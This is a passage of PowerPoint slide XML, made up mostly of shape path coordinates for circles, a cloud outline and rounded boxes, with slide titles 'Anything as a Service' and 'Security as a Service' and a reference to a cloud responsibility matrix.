                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175005" y="350012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221527" y="343760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263332" y="326117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298751" y="298751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326117" y="263332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343760" y="221527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350011" y="175005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343760" y="128484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326117" y="86679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298751" y="51260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263332" y="23894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221527" y="6251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175005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6359" y="4055363"/>
              <a:ext cx="943356" cy="943355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9298658" y="3585217"/>
            <a:ext cx="4047490" cy="2414270"/>
            <a:chOff x="9298658" y="3585217"/>
            <a:chExt cx="4047490" cy="2414270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9298658" y="3585217"/>
              <a:ext cx="3219450" cy="2101215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3219450" h="2101215">
                  <a:moveTo>
                    <a:pt x="1973587" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1927955" y="1771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1883306" y="9152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1840316" y="21941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1799660" y="39940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1762014" y="62947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728052" y="90761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1698452" y="123183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1673888" y="160012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1652710" y="142730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606451" y="112596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1536146" y="81447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489573" y="68516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1442345" y="60885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394964" y="58417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1347936" y="60975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1301763" y="68423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256951" y="80624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214002" y="97441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173422" y="118739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1135713" y="144379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1101380" y="174225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070926" y="208142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044857" y="245991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002283" y="226204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958049" y="210202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912465" y="198039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865847" y="189768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="818506" y="185442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770757" y="185116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722912" y="188841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672336" y="197285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623908" y="209972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577845" y="226648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534362" y="247063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493677" y="270963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456005" y="298096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421564" y="328210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390568" y="361053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363236" y="396373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339782" y="433917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320424" y="473432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305377" y="514668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294859" y="557371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289085" y="601289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288272" y="646170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292636" y="691761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289969" y="698238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239732" y="706460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192155" y="721428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148014" y="742688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108086" y="769791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73145" y="802284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43970" y="839716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21104" y="882062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6527" y="925955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="970582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283" y="1015127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10140" y="1058775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26331" y="1100713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49617" y="1140126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79761" y="1176199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116524" y="1208118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159667" y="1235067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124650" y="1274679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98199" y="1318576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80708" y="1365680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72575" y="1414911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74196" y="1465191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83297" y="1507065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98800" y="1546319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120146" y="1582564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146778" y="1615410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178138" y="1644467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213669" y="1669346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252813" y="1689656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295013" y="1705008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339710" y="1715011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386347" y="1719276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434368" y="1717413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440464" y="1726684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467827" y="1763612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498102" y="1797761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531054" y="1829076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566444" y="1857506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604037" y="1882998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643595" y="1905499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684883" y="1924956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727662" y="1941316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771697" y="1954528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816750" y="1964537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="862585" y="1971291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908966" y="1974737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955655" y="1974824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002415" y="1971497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049011" y="1964704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095204" y="1954392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140759" y="1940509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185439" y="1923002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229007" y="1901817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258599" y="1937358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1291774" y="1969937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1328244" y="1999362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1367720" y="2025439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1409913" y="2047975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1454534" y="2066776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501295" y="2081649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551211" y="2092719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1601166" y="2099120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1650845" y="2101002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1699931" y="2098516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748109" y="2091813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795063" y="2081042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1840479" y="2066354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884041" y="2047899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925432" y="2025828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964339" y="2000290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000444" y="1971436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033433" y="1939417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2062989" y="1904383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088799" y="1866483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110545" y="1825870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2127913" y="1782691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169540" y="1803065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213222" y="1819160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258544" y="1830871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2305091" y="1838096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352449" y="1840730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402700" y="1838507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451292" y="1831320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2497900" y="1819453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2542198" y="1803191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2583861" y="1782818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2622563" y="1758618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2657979" y="1730875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2689783" y="1699875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2717650" y="1665901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2741254" y="1629238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2760270" y="1590170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2774372" y="1548982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2783236" y="1505958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2786535" y="1461381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2837421" y="1452519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2886814" y="1439127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2934347" y="1421340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2979656" y="1399291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3022374" y="1373116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3061674" y="1343372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3096725" y="1310881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3127480" y="1275960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3153892" y="1238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175914" y="1200092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3193500" y="1159777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3206603" y="1118297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3215175" y="1075968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3219172" y="1033106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3218545" y="990028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213249" y="947049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3203235" y="904486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188459" y="862656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3168873" y="821874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144430" y="782456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115084" y="744720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3120297" y="733314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3143354" y="654710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3147247" y="611380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3145183" y="568656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3137426" y="526944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3124238" y="486651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3105879" y="448183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082612" y="411946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3054699" y="378348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3022402" y="347794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2985982" y="320690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2945702" y="297445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2901823" y="278463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854607" y="264152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2842304" y="221161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2823606" y="180340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2798856" y="142244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2768393" y="107428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2732560" y="76446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2692984" y="50563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650860" y="30097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606796" y="15004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2561396" y="5242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2515269" y="765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2469019" y="1532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2423253" y="7498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2378578" y="18619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2335599" y="34852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2294924" y="56153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257158" y="82478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2222909" y="113784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198761" y="88674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141845" y="46740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065097" y="14086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019526" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1973587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58349" y="5753480"/>
              <a:ext cx="233299" cy="24574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189210" y="5520308"/>
              <a:ext cx="350520" cy="350520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="350520" h="350520">
                  <a:moveTo>
                    <a:pt x="175006" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128484" y="6251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86679" y="23894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51260" y="51260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23894" y="86679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6251" y="128484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6251" y="221527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23894" y="263332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51260" y="298751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86679" y="326117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128484" y="343760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175006" y="350012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221527" y="343760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263332" y="326117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298751" y="298751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326117" y="263332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343760" y="221527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350012" y="175005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343760" y="128484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326117" y="86679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298751" y="51260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263332" y="23894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221527" y="6251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175006" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0ECFE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08408" y="4055363"/>
              <a:ext cx="937259" cy="9372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04414" y="2790698"/>
            <a:ext cx="10861040" cy="4957445"/>
            <a:chOff x="2804414" y="2790698"/>
            <a:chExt cx="10861040" cy="4957445"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2817114" y="2803398"/>
              <a:ext cx="10835640" cy="4932045"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10835640" h="4932045">
                  <a:moveTo>
                    <a:pt x="0" y="4931664"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10835640" y="4931664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10835640" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4931664"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="254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23032" y="2955036"/>
              <a:ext cx="10622280" cy="443941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234176" y="306451"/>
            <a:ext cx="37877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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anything</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="190">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="195">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Service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80303" y="760476"/>
            <a:ext cx="5256276" cy="36575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718684" y="1933193"/>
            <a:ext cx="681672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table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below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shows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cloud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responsibility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matrix.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16471" y="306451"/>
            <a:ext cx="362394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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="190">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="195">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Service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2703" y="760476"/>
            <a:ext cx="4968240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954148" y="2793873"/>
            <a:ext cx="12411075" cy="1567815"/>
            <a:chOff x="1954148" y="2793873"/>
            <a:chExt cx="12411075" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1974341" y="2803398"/>
              <a:ext cx="6565900" cy="579120"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6565900" h="579120">
                  <a:moveTo>
                    <a:pt x="6468872" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96519" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58935" y="7580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28257" y="28257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7580" y="58935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="96519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="579119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565391" y="579119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565391" y="96519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6557811" y="58935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6537134" y="28257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6506456" y="7580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6468872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974341" y="2803398"/>
              <a:ext cx="6565900" cy="579120"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6565900" h="579120">
                  <a:moveTo>
                    <a:pt x="96519" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6468872" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6506456" y="7580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6537134" y="28257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6557811" y="58935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565391" y="96519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565391" y="579119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="579119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="96519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7580" y="58935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28257" y="28257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58935" y="7580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96519" y="0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963673" y="3271266"/>
              <a:ext cx="12392025" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12392025" h="1080770">
                  <a:moveTo>
                    <a:pt x="12302870" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
